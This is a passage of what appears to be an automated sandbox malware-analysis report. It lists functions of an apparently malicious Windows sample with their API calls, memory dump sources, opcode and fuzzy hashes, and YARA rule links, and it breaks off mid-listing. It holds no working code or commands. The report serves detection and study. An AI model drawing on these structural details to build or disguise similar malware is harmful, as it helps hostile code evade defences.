                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: 5a8188bc36d4c3f314caa068babfd50b5c995ec3c52986095f265e212a5fc8b6
                                                                                                                                                                                                                                                • Instruction ID: 8aed3fbb387f3dc1d6c3365c287bb29a611b62a48e27b24295cc661ed064bd01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a8188bc36d4c3f314caa068babfd50b5c995ec3c52986095f265e212a5fc8b6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF0A072858262EBD310AF78BE05A5B3AB4EFC2720F050436F4029A260DA34E816C691
                                                                                                                                                                                                                                                Function 00AAEC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00AAECA2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                                                                                                                • Opcode ID: 96d2b20a6a40f55d6a5382012ce95a74931305990b8a0a96dd383b9b9ec3ce1a
                                                                                                                                                                                                                                                • Instruction ID: 8f75c7ece1926dbd0a81cf4beffa6dcbb69a76f5fbb06360cbe3073bc56377b2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96d2b20a6a40f55d6a5382012ce95a74931305990b8a0a96dd383b9b9ec3ce1a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5E092347DA3827AF6798665ECA3F2931169B42F29F306305B3253E3D4DAD03102820D
                                                                                                                                                                                                                                                Function 00AD0B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                                • Opcode ID: 2a601db17fc624b84a423c544d846958c34239d1c4a8c7f488310603ac770014
                                                                                                                                                                                                                                                • Instruction ID: 5be0e8111f0c00fdb85e83b94af852a7076bd399b76ed476e48dbefd2429fe1c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a601db17fc624b84a423c544d846958c34239d1c4a8c7f488310603ac770014
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20F0D0B4109701CFD344DF24D5A471A7BF0FB88304F10884CE4969B390CB759A49CF82
                                                                                                                                                                                                                                                Function 00AD28EB Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                                • Opcode ID: d7ca138dd5451e7a98976222f4d081c4cf2b19126629374553b581e7ab93c3d8
                                                                                                                                                                                                                                                • Instruction ID: d60f1ef37ca34d66b909993c20c4072a91fd2b9faded893690ac02bf14ed2c10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7ca138dd5451e7a98976222f4d081c4cf2b19126629374553b581e7ab93c3d8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF07A745083418FD314DF64C5E871BBBE0BB84308F00891DE5998B390C7B59549CF82
                                                                                                                                                                                                                                                Function 00AA9EB7 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 00AA9ED2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Startup
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                                                                                                • Opcode ID: 8966e7395e23f2e442868baa73dbbc3c925e19826c049055b67a02a605d959fd
                                                                                                                                                                                                                                                • Instruction ID: 8eba3c75cc33697362b0d57ffa9ad3aaca96a251e22f92fed1ba0a6fe6624fb7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8966e7395e23f2e442868baa73dbbc3c925e19826c049055b67a02a605d959fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55E02B33A406439BD700DBB4FC97E8A3356DB15345705C429E216DD171EA72A4119B10
                                                                                                                                                                                                                                                Function 00ADC570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,00ADE0F9), ref: 00ADC590
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                • Opcode ID: 8191a9d0c6a81a3e081de060ff8d20e9a8c89eaeef87efbc730a97f55608761b
                                                                                                                                                                                                                                                • Instruction ID: c93b895c87e52574883526a49d33e3564a474ee3a77cef800b8410c066172c70
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8191a9d0c6a81a3e081de060ff8d20e9a8c89eaeef87efbc730a97f55608761b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDD0C931815222EBCA506F68BC15BD73A64DF49220F070892B405AA174C624EC92CAD0
                                                                                                                                                                                                                                                Function 00ADC55C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 00ADC561
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: d774d52a573252411c1701a739673fdc39c242c595257afe73c816dc10a37591
                                                                                                                                                                                                                                                • Instruction ID: a753d90cf6636df00babcce3f2ebc63eedc8b7b83690004aa9c4ad6d6f677f8e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d774d52a573252411c1701a739673fdc39c242c595257afe73c816dc10a37591
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99A001711851109ADA966BA4BC09B94BA21EB58621F124191E101990F686619892DA84
                                                                                                                                                                                                                                                Function 00AF9703 Relevance: 1.3, APIs: 1, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 00AFA0B7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                • Opcode ID: ba5aee253fedc89ee2354c0977e7fe0aaaf4649644f2eb8030969b9144635305
                                                                                                                                                                                                                                                • Instruction ID: 90b79f0981e2a16e37ca7ada97ec2852b444d9efca6135aea529eb76a5cabb92
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba5aee253fedc89ee2354c0977e7fe0aaaf4649644f2eb8030969b9144635305
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B01FCB214D209AFEB041F75EC4457F77A8EF05731F25491EF996C2B40EA765C418613
                                                                                                                                                                                                                                                Function 00AF952E Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                • Opcode ID: 5133dcf88b4548b9aef3ae76f4804c4bc3531a4cd1a56c58b29ae88edd0ba860
                                                                                                                                                                                                                                                • Instruction ID: 949aff8437edd786c3562ffd77dffd32b122665716999e3fb7e5c4b071be88a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5133dcf88b4548b9aef3ae76f4804c4bc3531a4cd1a56c58b29ae88edd0ba860
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCD0C9F1808309CFC7A55F9080150BEB6F4FA51300F52040DE9C512601D7B108D0CB0B

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 00AC42D0 Relevance: 39.6, APIs: 2, Strings: 20, Instructions: 1129COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00AC43AA
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00AC443E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                                • API String ID: 237503144-1429676654
                                                                                                                                                                                                                                                • Opcode ID: 6155beef7ffe214d38310d075c27d8524b8dfa8259945cb66631801b7f09d27a
                                                                                                                                                                                                                                                • Instruction ID: 651a2e0f4966e24736d5e73875ab882850eca2ac9a065e7c5b7ee86065b665a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6155beef7ffe214d38310d075c27d8524b8dfa8259945cb66631801b7f09d27a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCC20CB560C3848AD334CF54D452BDFBAF2FB82300F00892DD5E96B255D7B5864A8B9B
                                                                                                                                                                                                                                                Function 00AB60E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
